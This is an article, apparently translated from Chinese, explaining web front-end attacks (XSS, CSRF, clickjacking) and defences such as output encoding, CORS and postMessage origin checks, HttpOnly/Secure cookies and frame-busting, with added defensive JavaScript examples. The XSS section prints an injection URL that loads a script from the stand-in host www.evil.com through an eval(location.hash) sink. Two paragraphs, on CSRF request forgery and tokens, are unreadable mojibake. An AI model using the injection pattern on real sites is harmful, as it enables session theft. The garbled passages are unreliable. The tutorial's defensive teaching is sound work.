Preface
With the rapid spread of the Internet, the victims of network security problems are no longer only collective bodies such as governments and enterprises; every ordinary person who touches the network can become the victim of a network attack. As the network has spread, the methods hackers use have grown more numerous and more complex. Taking attacks on websites as an example, according to statistics from the National Computer Network Emergency Response Technical Team/Coordination Center (CNCERT), one in five government websites is broken into within a year, and the number of intrusions more than doubles every year. Besides the growth in the number and skill of attackers, the low level of protection on many web servers has also fed the growth in attacks. In recent years, security vulnerabilities in many websites have caused leaks of users' personal information, and many ordinary users have suffered financial losses. On WooYun, the well-known domestic vulnerability reporting platform, large numbers of web vulnerabilities are reported continuously. The published reports show that even large, technically capable service providers often ship fatal vulnerabilities in the products they offer. Clearly, domestic network security problems are serious. The main methods hackers use against websites are SQL injection, phishing, cross-site attacks, denial of service and so on. Website operators, of course, have many countermeasures, such as building strong firewalls. But only a website that is itself highly secure can withstand complex attacks, and that requires its developers to follow certain security norms when building it.
Looking at a website from the front-end/back-end perspective, the back end is the top priority for security: it holds the site's important information, such as user accounts, password data, credit cards and other sensitive data, and this information is what attackers most want. But as front-end business logic grows larger and more complex, malicious attacks aimed at the front end are also increasing. Front-end technologies such as HTML, JavaScript, CSS and Flash have become the battlefield between front-end attackers and developers, and website security problems have begun to tilt toward the front end.
Common Web front-end attack methods
To understand how to defend against Web front-end attacks, one must first know the common front-end attack techniques. At present the main ways of attacking a website's front end are the following:
1. XSS
XSS stands for Cross Site Scripting. XSS happens on the user's browser side: while loading an HTML document, the user ends up executing an unexpected malicious script. These malicious scripts usually come from a third-party domain and are harmful; running them leaks the user's sensitive data or tricks the user into wrong operations. The browser's same-origin policy does not restrict a page from loading third-party scripts, which gives attackers an opening. A typical case goes like this: the attacker finds a script-injection flaw in the website, for instance that user input is displayed on the page directly without validation or escaping, and enters an attacking script as input so that it executes on the page. The malicious script modifies the page's content and tricks the user into operating the modified page, thereby stealing the user's cookie. The following code demonstrates a typical XSS attack.
If the website's front-end code contains the following fragment:

    <script> eval(location.hash.substr(1)); </script>
An attacker who finds such code on a page can build a URL like this:

    http://host/test.html#document.write("<script/src=//www.evil.com/evil.js></script>")
In this way the attacker injects an external JavaScript file into the target site. If the attacker writes malicious code in that external file, such as reading the cookie, they can take over the user's account privileges on the attacked site.
To summarise, the defining trait of an XSS attack is: by any means available, execute on the target site a script that was not originally part of it.
2. CSRF
CSRF stands for Cross Site Request Forgery. The concept is easily confused with XSS. Both CSRF and XSS attacks issue requests, but in CSRF the request originates from another website, that is, it is a cross-site request. Moreover the request is not what the user intended: it is a forged request that the user is tricked into sending. A typical CSRF attack proceeds as follows.
Suppose site a has a page that deletes data via a GET request, using this URL:

    http://www.a.com/del?id=21
¹¥»÷Õ߾ͿÉÒÔÀûÓÃÕâÒ»µã£¬¹¹½¨Ò»¸öÒ³Ãæ²¢´´½¨Ò»¸öÖ¸Ïò´ËÁ´½ÓµÄiframe¡¢img»òÕßscriptµÈ±êÇ©¡£Ï൱ÓÚαÔìÁËÒ»¸öGETÇëÇó¡£
The attacker then publishes the address of the new page with some eye-catching message to lure target users into opening it. Opening the page indirectly completes the deletion.
This CSRF process is clearly different from XSS: the attack need not involve any JavaScript at all. JavaScript can of course be used if desired, for example to build a form dynamically and issue a POST request against the target site.
3. UI redressing (interface operation hijacking)
UI redressing is a Web front-end attack that emerged only in recent years; large sites such as Twitter and Facebook have been hit by it. By the user action involved it can be divided into clickjacking and drag-and-drop hijacking, which, as the names say, hijack the user's click and drag operations respectively.
UI redressing uses visual deception to induce the user to act. For example, an invisible frame (such as an invisible iframe) is laid over a visible input box; when the user clicks the input box they are actually clicking the content in the invisible frame, and so perform operations they did not intend. These operations can lead to leakage of sensitive information, data loss and similar consequences.
Front-end techniques make it easy to create an invisible iframe that floats on top of everything; the following style code shows a concrete implementation:

    filter:alpha(opacity=0); opacity:0; z-index: 100;
The above sets the frame's opacity to 0, i.e. fully transparent. Assuming every other element on the page has a z-index below 100, the iframe with z-index 100 floats to the very top, so mouse actions on the page land first on the iframe's content, even though the user believes they are acting on the area the iframe covers. That is the visual deception. UI redressing is therefore not a technically sophisticated attack: designing a page attractive enough to make users interact is generally all it takes.
These are the three common attacks on front-end pages today. Although the front end has become one of the main entry points for Web attacks, front-end developers' defences against these attacks are still far from adequate, and security awareness is weak. So how should we defend?
How to defend against Web front-end attacks
1. Do not trust any externally supplied data
An important piece of common sense for defending the Web front end is: never trust data entered by the user; always apply format checks, filtering and similar operations to user input to prevent any possible front-end injection. The following are concrete practices to apply in front-end development.
Do not trust user input
Most websites interact with user input, or have modules that receive input via the URL. These input entry points give attackers an opening, and XSS attacks exploit exactly these entries. Preventing them is not complicated: add the necessary input validation and filtering at every one of these entry points. Concretely, apply HTML encoding, HTML attribute encoding, JavaScript encoding, CSS encoding or URL encoding to the user-supplied content.
If the project uses jQuery, these encoding operations become much simpler, because jQuery's built-in DOM manipulation API already encodes the content it is given: for example, display user input with $('...').text(data) rather than $('...').html(data), add attributes with $('...').attr(), add styles with $('...').css(), and so on. For URL encoding, use the native encodeURIComponent (or encodeURI) function directly.
If finer control over the input is wanted, the jQuery plugin jqencoder can be used. It provides the following encoding interfaces:

    $.encoder.encodeForHTML()
    $.encoder.encodeForHTMLAttribute()
    $.encoder.encodeForJavaScript()
    $.encoder.encodeForCSS()
    $.encoder.encodeForURL()
Besides the necessary checking and filtering, also avoid function calls that are security hazards, such as passing input directly to eval, setInterval or setTimeout to be executed.
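The following is an added example, not code from the original article or from the jqencoder plugin: plain-JavaScript versions of the five context encoders the article lists, followed by a safe replacement for the eval(location.hash) pattern shown in the XSS section. The ALLOWED_VIEWS table and the renderGreeting helper are constructed for the example.

```javascript
// Added example (not from the original article): output encoding per context,
// plus treating the URL fragment as data instead of code.

// HTML text context: encode the five characters that can change HTML structure.
function encodeForHTML(input) {
  return String(input).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
  })[c]);
}

// HTML attribute context: encode everything except alphanumerics as &#xHH;
// so the value can never terminate a quoted attribute.
function encodeForHTMLAttribute(input) {
  return String(input).replace(/[^A-Za-z0-9]/g,
    (c) => "&#x" + c.charCodeAt(0).toString(16).toUpperCase() + ";");
}

// JavaScript string context: \xHH for code points below 256, \uHHHH otherwise.
function encodeForJavaScript(input) {
  return String(input).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// CSS value context: "\HH " escape sequences (the trailing space ends the escape).
function encodeForCSS(input) {
  return String(input).replace(/[^A-Za-z0-9]/g,
    (c) => "\\" + c.charCodeAt(0).toString(16) + " ");
}

// URL parameter context: the native function is the right tool here.
function encodeForURL(input) {
  return encodeURIComponent(String(input));
}

// The article's vulnerable pattern is eval(location.hash.substr(1)), which runs
// whatever follows "#". The safe pattern parses the fragment as key=value data
// and looks the value up in a fixed allow-list; anything unknown is ignored.
const ALLOWED_VIEWS = { home: "Home", settings: "Settings" }; // constructed

function viewFromHash(hash) {
  const params = new URLSearchParams(String(hash).replace(/^#/, ""));
  const view = params.get("view") || "home";
  return Object.prototype.hasOwnProperty.call(ALLOWED_VIEWS, view) ? view : "home";
}

// Builds markup from untrusted text using the encoder for each context, so
// the same input stays inert both as attribute value and as text content.
function renderGreeting(untrustedName) {
  return '<span title="' + encodeForHTMLAttribute(untrustedName) + '">' +
    "Hello, " + encodeForHTML(untrustedName) + "</span>";
}
```

The important design point is that each encoder is chosen by where the value lands (text, attribute, script string, style, URL), not by what the value looks like; a single "sanitize" routine cannot be correct for all five contexts.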
Do not trust any third-party data
Front-end designs often load data supplied by third parties. Because of the browser's same-origin policy, JavaScript cannot directly load data from a third-party domain, but several common techniques get around the restriction. The traditional one is JSONP, which exploits the browser's ability to load third-party JavaScript. Suppose site A requests data from site B: A requests a script file from B via a script tag, passing a callback function name in the URL; on receiving the request, B wraps the data in a call to the callback named by A and returns that as the script, with the data as the callback's argument. A references the script roughly like this:

    <script src="http://server2.example.com/RetrieveUser?UserId=1823&jsonp=parseResponse"> </script>
Here parseResponse is the callback name passed in; the code B returns looks like:

    parseResponse({"Name": "Cheeso", "Id" : 1823, "Rank": 7})
The example above is taken from the Wikipedia page on JSONP. Although JSONP achieves cross-domain data transfer ingeniously, it carries security hazards. Normally the third-party site passes JSON-format data to the callback, but if the third-party site is compromised so that what it returns contains malicious code instead of plain JSON data, executing that returned code leads to unforeseeable attacks. So a site that uses JSONP must check the format of the data returned by the third party. The check is simple: verify that the returned property names are the expected ones and that the property values fall within the expected ranges. The data provider (the third party) is even more exposed to attack, for example an XSS attack via a crafted, illegal callback function name; the defence is to filter illegal characters out of the callback name. The provider must also guard against floods of malicious requests, i.e. DDoS attacks, which use legitimate-looking service requests to consume excessive server resources; the remedy is to restrict access with a whitelist or a cookie token. A safer approach is CORS, introduced with the new HTML5 standards; it is still rarely used domestically but has many uses abroad. JSONP's cross-domain access slips through a loophole in the same-origin policy and is a trick; CORS is a cross-domain data access technique defined deliberately in the specification. CORS is more advanced and reliable than JSONP and is supported by mainstream browsers. JSONP can only use GET requests, whereas CORS has no such restriction and can even issue requests via AJAX. CORS works mainly by setting the Access-Control-Allow-Origin header on the server side, which restricts where requests may originate. An example setting:

    Access-Control-Allow-Origin: http://www.dang-jian.com
This setting means cross-domain requests from www.dang-jian.com are allowed. Although CORS is more reliable than JSONP, some security rules still apply. For instance, Access-Control-Allow-Origin should be set to the smallest possible scope and should not be set to *, which allows all cross-domain requests. After receiving data, the recipient must still validate its format and integrity and treat the returned content as data, not code, to avoid attacks via malicious data.
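The checks described in the JSONP and CORS paragraphs above, as an added example that is not part of the original article: on the provider side, an allow-list for the callback name; on the consumer side, the property-name and value-range check for the {"Name","Id","Rank"} record; and a CORS helper that echoes exactly one allowed origin. The allow-list contents and the value ranges are constructed for the example.

```javascript
// Added example (not from the original article). Hostnames, ranges and the
// record schema are constructed to match the article's JSONP sample.

// --- Data provider side: the callback name is attacker-controlled input. ---
// Accept only a plain (optionally dotted) JavaScript identifier, so a value
// like "alert(1);//" can never be reflected into the script response.
const CALLBACK_NAME = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isValidCallbackName(name) {
  return typeof name === "string" && name.length <= 64 && CALLBACK_NAME.test(name);
}

// Builds the JSONP body, or returns null when the callback name is rejected.
// U+2028/U+2029 are valid in JSON but were line terminators in JS source, so
// they are escaped; the leading comment is a conventional guard against the
// response being interpreted as some other file type.
function buildJsonpResponse(callback, payload) {
  if (!isValidCallbackName(callback)) return null;
  const json = JSON.stringify(payload)
    .replace(/\u2028/g, "\\u2028").replace(/\u2029/g, "\\u2029");
  return "/**/" + callback + "(" + json + ");";
}

// --- Data consumer side: check the shape of what the callback received. ---
function validateUserRecord(data) {
  if (data === null || typeof data !== "object" || Array.isArray(data)) return false;
  if (Object.keys(data).sort().join(",") !== "Id,Name,Rank") return false; // expected names only
  return typeof data.Name === "string" && data.Name.length <= 100 &&
    Number.isInteger(data.Id) && data.Id > 0 &&
    Number.isInteger(data.Rank) && data.Rank >= 0 && data.Rank <= 10;   // expected ranges
}

// The callback the article's sample names; it refuses anything off-schema.
function parseResponse(data) {
  if (!validateUserRecord(data)) throw new Error("unexpected JSONP payload");
  return data.Name + " (rank " + data.Rank + ")";
}

// --- CORS: answer with one specific origin, never "*" for sensitive data. ---
const ALLOWED_ORIGINS = new Set(["http://www.dang-jian.com"]); // constructed allow-list

function corsHeadersFor(requestOrigin) {
  if (!ALLOWED_ORIGINS.has(requestOrigin)) return {};   // no CORS headers at all
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Vary": "Origin",   // caches must not reuse this response for another origin
  };
}
```

Note that an origin outside the allow-list gets no Access-Control-Allow-Origin header rather than a different value; the browser then blocks the cross-origin read by default.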
The HTML5 specification also introduces another cross-domain data transfer mechanism, the window.postMessage interface. Usage example:

    popup.postMessage("this is the transmitted data", "https://secure.example.net");

Then add the following code in the target page:

    function receiveMessage(event) {
      if (event.origin !== "http://example.org") {
        return;
      }
      // event.source refers to popup
      // event.data contains "this is the transmitted data"
    }
    window.addEventListener("message", receiveMessage, false);
When the source page calls postMessage to send data to the target page, the target page's message event fires, and the event object carries the transmitted data. The precautions for postMessage are similar to those for CORS: do not set the recipient to *, set it to a specific address. The receiving side should check the source address of the data and validate the data it receives. Do not transmit code across domains, so that malicious code cannot be executed. If the site does not need to receive any data, do not bind a message event handler at all.
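The postMessage rules above (explicit target origin on the sending side; origin check, then data-only parsing on the receiving side), as an added example that is not from the original article. The origins are constructed, and the "window" objects are plain stand-ins so the code runs outside a browser; in a real page you would pass window and the actual popup or frame.

```javascript
// Added example (not from the original article). TRUSTED_SENDER and
// TARGET_ORIGIN are constructed values.
const TRUSTED_SENDER = "https://secure.example.net";
const TARGET_ORIGIN = "https://secure.example.net";   // never "*" for sensitive data

// Sender side: always name the target origin explicitly, and send data, not code.
function sendUpdate(targetWindow, payload) {
  targetWindow.postMessage(JSON.stringify({ type: "update", payload }), TARGET_ORIGIN);
}

// Receiver side: origin first, then parse (never eval), then check the schema.
// Returns a short verdict string so the decision can be inspected and tested.
function createMessageHandler(onUpdate) {
  return function receiveMessage(event) {
    if (event.origin !== TRUSTED_SENDER) return "rejected:origin";
    let msg;
    try {
      msg = JSON.parse(event.data);
    } catch (e) {
      return "rejected:format";
    }
    if (!msg || msg.type !== "update" || typeof msg.payload !== "string") {
      return "rejected:schema";
    }
    onUpdate(msg.payload);
    return "accepted";
  };
}

// Bind only when the page actually needs to receive messages.
function installHandler(win, onUpdate) {
  const handler = createMessageHandler(onUpdate);
  win.addEventListener("message", handler, false);
  return handler;
}
```

The handler returns before touching event.data whenever the origin is wrong, which is the order the article recommends: source address first, content second.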
ÒÔÉÏÕ⼸ÖÖ·À·¶¿çÕ¾¹¥»÷µÄÊÖ¶Î×îÊʺÏÓÃÓÚÍøÕ¾Ìṩ¶ÔÍâ½Ó¿ÚµÄÇéÐΣ¬Èç¹ûÍøÕ¾²»Ìṩ¶ÔÍâ½Ó¿Ú£¬Ôò·À·¶°ì·¨¾Í²»ÓÃÄÇôÂé·³ÁË£¬ÓÐһЩ³£¹æÊֶοÉÒÔʹÓᣱÈÈçÿ´ÎÇëÇó¶¼¶îÍâÌí¼Óǰºó¶Ë¶¼Ô¼¶¨ºÃ¼ÓÃÜtoken¡£ÕâÑùµÄ²å¼þÓкܶ࣬Ҳ¿ÉÒÔ×Ô¼ºÊµÏÖ¡£Èç¹ûÏîÄ¿ÊÇ»ùÓÚNodeJSºÍExpress£¬ÔòÍÆ¼öʹÓÃcsurfÖмä¼þ£¬Õâ¸öÖмä¼þרÃÅÓÃÓÚ·À·¶CSRF¹¥»÷£¬¿ÉÒԲ鿴Æä¹Ù·½ÍøÕ¾»ñµÃ¸ü¶àÐÅÏ¢¡£
Do not rely on JavaScript alone to stop injection
If user input is to be stored in a back-end database, validating it with JavaScript alone is not enough. JavaScript code is far too easy for an attacker to intercept and modify, and a user can even bypass the page and talk to the back end directly. So the back-end code must also perform the necessary validation, and it should be stricter than the front end's.
2. Other front-end security practices
Use cookies more safely
On many sites a cookie is what keeps the user logged in, so whoever obtains the cookie can hijack the user's privileges on the site. One goal of front-end XSS attacks is to obtain the cookie, and this is the main way cookies leak. The most effective way to prevent this leak is to mark the cookie HttpOnly, which forbids JavaScript from accessing it, so an XSS attack cannot read the cookie through JavaScript. HttpOnly cookies are supported by essentially all browsers, so their use is recommended. Manipulating cookies from JavaScript on a site is an unsafe practice; where data must be passed and stored that way, try a safer alternative such as HTML5 LocalStorage.
Besides HttpOnly, another security-related cookie setting is Secure. A cookie marked Secure is sent to the server only when the browser makes an HTTPS request, which is very useful if the cookie holds sensitive information. If the site uses SSL, the Secure setting should be enabled.
Two other commonly used cookie settings are domain and path, which determine the cookie's scope. Normally they need not be set, but if code does set them, the scope should be the smallest possible, so the cookie cannot be reached from unrelated paths or domains.
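The cookie attributes discussed in the three paragraphs above, as an added example that is not from the original article: a builder that emits a Set-Cookie header with HttpOnly and Secure on by default and the narrowest Path, and an audit function that reports a session cookie missing those flags or carrying a Domain broader than the serving host. Cookie names, values and hosts are constructed.

```javascript
// Added example (not from the original article). Names, values and hosts
// below are constructed.

// Characters RFC 6265 permits in a cookie-value (no ";", ",", "\"", space).
const COOKIE_VALUE = /^[\x21\x23-\x2B\x2D-\x3A\x3C-\x5B\x5D-\x7E]*$/;

// Builds a Set-Cookie header line. HttpOnly and Secure default to on; callers
// must opt out explicitly for the rare cookie that scripts really need.
function buildSetCookie(name, value, opts) {
  if (!/^[\w-]+$/.test(name)) throw new Error("invalid cookie name");
  if (!COOKIE_VALUE.test(value)) throw new Error("invalid cookie value");
  const parts = [name + "=" + value];
  // Scope as narrowly as possible: set Domain only when needed, keep Path tight.
  if (opts.domain) parts.push("Domain=" + opts.domain);
  parts.push("Path=" + (opts.path || "/"));
  if (opts.httpOnly !== false) parts.push("HttpOnly");   // no script access
  if (opts.secure !== false) parts.push("Secure");       // HTTPS only
  return parts.join("; ");
}

// Audits an existing Set-Cookie line and returns the list of problems found.
// ctx.host is the host that serves the page; ctx.sessionCookie marks a
// cookie that carries login state and therefore must be HttpOnly.
function auditSetCookie(headerLine, ctx) {
  const attrs = headerLine.split(";").slice(1).map((s) => s.trim());
  const lower = attrs.map((a) => a.toLowerCase());
  const problems = [];
  if (ctx.sessionCookie && !lower.includes("httponly")) problems.push("missing HttpOnly");
  if (!lower.includes("secure")) problems.push("missing Secure");
  const domainAttr = attrs.find((a) => a.toLowerCase().startsWith("domain="));
  if (domainAttr) {
    // A Domain attribute widens scope to every subdomain; flag it unless it
    // names exactly the serving host.
    const domain = domainAttr.slice(7).replace(/^\./, "").toLowerCase();
    if (domain !== ctx.host.toLowerCase()) {
      problems.push("Domain " + domain + " is broader than " + ctx.host);
    }
  }
  return problems;
}
```

Running auditSetCookie over the Set-Cookie lines a server actually emits (for example from a captured response) is a quick way to find session cookies that were never given HttpOnly or Secure.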
Prevent the page from being embedded as an iframe by other sites
The previous section introduced UI redressing, which works precisely by embedding a transparent iframe in a page to deceive the user. To avoid this attack, the page must be made impossible for other sites to embed. The traditional way is to use JavaScript to stop the page being nested by other pages. First add the following style to the page:

    <style id="antiClickjack">body{display:none !important;}</style>

and add JavaScript similar to this:

    <script type="text/javascript">
    if (self === top) {
      var antiClickjack = document.getElementById("antiClickjack");
      antiClickjack.parentNode.removeChild(antiClickjack);
    } else {
      top.location = self.location;
    }
    </script>
The code above first makes the whole page invisible, then the JavaScript detects whether the page is embedded. If it is not, the style that hides the page is removed; otherwise the top-level page's address is set to that of the embedded page, which defeats the embedding.
Browsers also support controlling whether a page may be embedded via the X-Frame-Options response header. It has three settings: DENY, SAMEORIGIN and ALLOW-FROM url, meaning respectively forbid embedding, allow pages of the same origin to embed, and allow the page at a specific URL to embed. At present only ALLOW-FROM has browser compatibility problems; the other two are supported by most browsers. So in terms of browser compatibility the script approach is currently the best way to block embedding, but if the site simply wants to forbid embedding altogether, setting X-Frame-Options is the simplest and most effective solution.
As the saying goes, as virtue rises one foot, vice rises ten. New attack methods will keep appearing over time, so developers must keep security in mind while writing front-end code and keep strengthening their defences.